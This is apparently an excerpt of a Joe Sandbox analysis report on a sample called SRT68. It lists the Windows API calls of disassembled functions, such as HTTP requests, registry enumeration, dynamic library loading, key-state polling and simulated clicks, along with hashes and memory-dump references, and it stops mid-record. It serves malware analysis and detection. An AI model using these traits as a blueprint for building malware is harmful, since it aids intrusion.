                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 0e19affee22d64c392843810a219e70cebb789ba0d1e567f21bf0e30056cff60
                                                                      • Instruction ID: b12030a2be556af866a6cb4769bc0980607e7fa6d26bbbfcbf0d1c1c6a30a9f9
                                                                      • Opcode Fuzzy Hash: 0e19affee22d64c392843810a219e70cebb789ba0d1e567f21bf0e30056cff60
                                                                      • Instruction Fuzzy Hash: 7721D5B5A00109BEDB24ABB08C45DFFB779DF493A0F144519F955971E1DF3D480AB610
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010118A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                        • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                        • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                      • Instruction ID: 828475eee851a34522e4e312a9770c3acfd0db540bd5549d3c312ef83794d03b
                                                                      • Opcode Fuzzy Hash: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                      • Instruction Fuzzy Hash: 5E21B0B1500309BFEB259FA4DC84EBF77FDEB48684F10812AFA85D2144DB798D0597A1
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01026461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 01026468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0102647D
                                                                      • DestroyWindow.USER32(?), ref: 01026485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                      • Instruction ID: 448664710f8c720a092376b449f01b557a167af4c66bb2ece7c7b7eb2df7a8c4
                                                                      • Opcode Fuzzy Hash: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                      • Instruction Fuzzy Hash: 8A218E71100226ABEF214E68DC54EBB77EEEB49364F108669FED093091DB369C419760
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 01006E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                      • Instruction ID: 5c92dff753687d1a1634bf86fbfe8eb982f0bb1ac907fdcd0f3305ac17fc8daa
                                                                      • Opcode Fuzzy Hash: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                      • Instruction Fuzzy Hash: 2E21657190030AABEB31AF29D804A9A7BF9EF45720F20465AFDE1D72D0D7729964CB50
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 01006E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 01006ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01006F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                      • Instruction ID: cb8671629d5c13721a06d3c54322c7c20ea60e8ac1df166889b59cffb00914c6
                                                                      • Opcode Fuzzy Hash: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                      • Instruction Fuzzy Hash: 3121907150034A9BFB319F6DD804AAA77E9AF45720F200A59FDE0D72C0D772A8618B60
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0100ACA8
                                                                      • __swprintf.LIBCMT ref: 0100ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0102F910), ref: 0100ACFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      • Opcode ID: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                      • Instruction ID: c7cb02d55cc12ff263c10eba01beb63b1f47e995571e915328e04faa648ad8e9
                                                                      • Opcode Fuzzy Hash: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                      • Instruction Fuzzy Hash: 8F219D70A0020AAFCB20DF65CD45DAF7BB8EF4A714B1040A9F949EB251DA75EA01DB21
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01001B19
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                      • Instruction ID: 613eb35d8fcfd2867fd70e85ae3036b7ab733731a7c8c6a56b11a7c2b38a0c02
                                                                      • Opcode Fuzzy Hash: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                      • Instruction Fuzzy Hash: F9115E70900209CF9F41EF64DD529EEB7B4FF16308F108499DCA467296EB3A9906DB50
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0101EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0101EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0101ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 0101EDEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      • Opcode ID: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                      • Instruction ID: b06fb78e6a74a559550530f205e25c9d35719386ad36aea14c4c757f5290f5d0
                                                                      • Opcode Fuzzy Hash: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                      • Instruction Fuzzy Hash: AB8170B16043009FD761EF28CC86F2EB7E5AF45750F44882DF999DB292DAB8AC41CB51
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction ID: 8a188ed431c9feacafcd7be8e8355db4966a8051a5b1d7977aad34c25a78f64d
                                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction Fuzzy Hash: 8151B971E00A079BCB18CE65DE42F6D77A2AF40734F284A2DF425962D0D774ADD0AB40
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010200FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01020183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 010201AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 010201BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      • Opcode ID: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                      • Instruction ID: 3e76dd712f2bcad6a2a9602c0c47b8ea55c2ff7d378d359225bd25486366b2f8
                                                                      • Opcode Fuzzy Hash: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                      • Instruction Fuzzy Hash: EB516771208305AFD714EF68CC81EABB7E9AF84304F54492DF5898B2A1DB39E904DB52
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0101D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0101D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0101DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101DA21
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      • Opcode ID: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
                                                                      • Instruction ID: cc02507f981e4b4026c39040790400c02636d3a4c002e940859b0a6f3d438f3e
                                                                      • Opcode Fuzzy Hash: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
                                                                      • Instruction Fuzzy Hash: C9514D75A04209DFCB10EFA8C8889ADB7F5FF09310B5480A9E855AB312D739ED45CF90
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0100E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0100E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0100E687
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0100E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0100E6B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      • Opcode ID: 54413097d1488c060f24ea9641c80866f320842c89fc696888631ca677f6e4ba
                                                                      • Instruction ID: b18f85e0040bea1810062f1b14873571de40588ef574c70d0049ca027da7b59a
                                                                      • Opcode Fuzzy Hash: 54413097d1488c060f24ea9641c80866f320842c89fc696888631ca677f6e4ba
                                                                      • Instruction Fuzzy Hash: 4A516D75A00105DFDB01EF64C981AAEBBF5EF0A310F1480A9E849AB362CB79ED01DF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                      • Instruction ID: 86d3b495afd07f999d79a4a75610a91bf4f263a9ab1d8cbdb599f11f1fff16b9
                                                                      • Opcode Fuzzy Hash: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                      • Instruction Fuzzy Hash: F341D635A04124EFD760DE28CC88FA9BFE4EB093A0F240595FA95A76D1CF349941DB50
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00FA2357
                                                                      • ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                      • Instruction ID: c17fba3df6f73ff3f0e5d266d8f7356af280121f7d8489b862e79a5a076fd8ad
                                                                      • Opcode Fuzzy Hash: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                      • Instruction Fuzzy Hash: CF418275A04216FBCF259F68C848AEDBB75FF06370F24431AE86992290C735A950FF91
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF63E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00FF6433
                                                                      • TranslateMessage.USER32(?), ref: 00FF645C
                                                                      • DispatchMessageW.USER32(?), ref: 00FF6466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF6475
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      • Opcode ID: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                      • Instruction ID: a4cca79a780bb7eb256d24bff6688ef1863b000907853a038de7f2115fe03d3c
                                                                      • Opcode Fuzzy Hash: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                      • Instruction Fuzzy Hash: 3331A47190024BAFDB34DEB0DC44BB67BB8AF05360F140165E661C31B5EB2A9489F760
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00FF8A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00FF8ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FF8AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00FF8AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FF8AF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
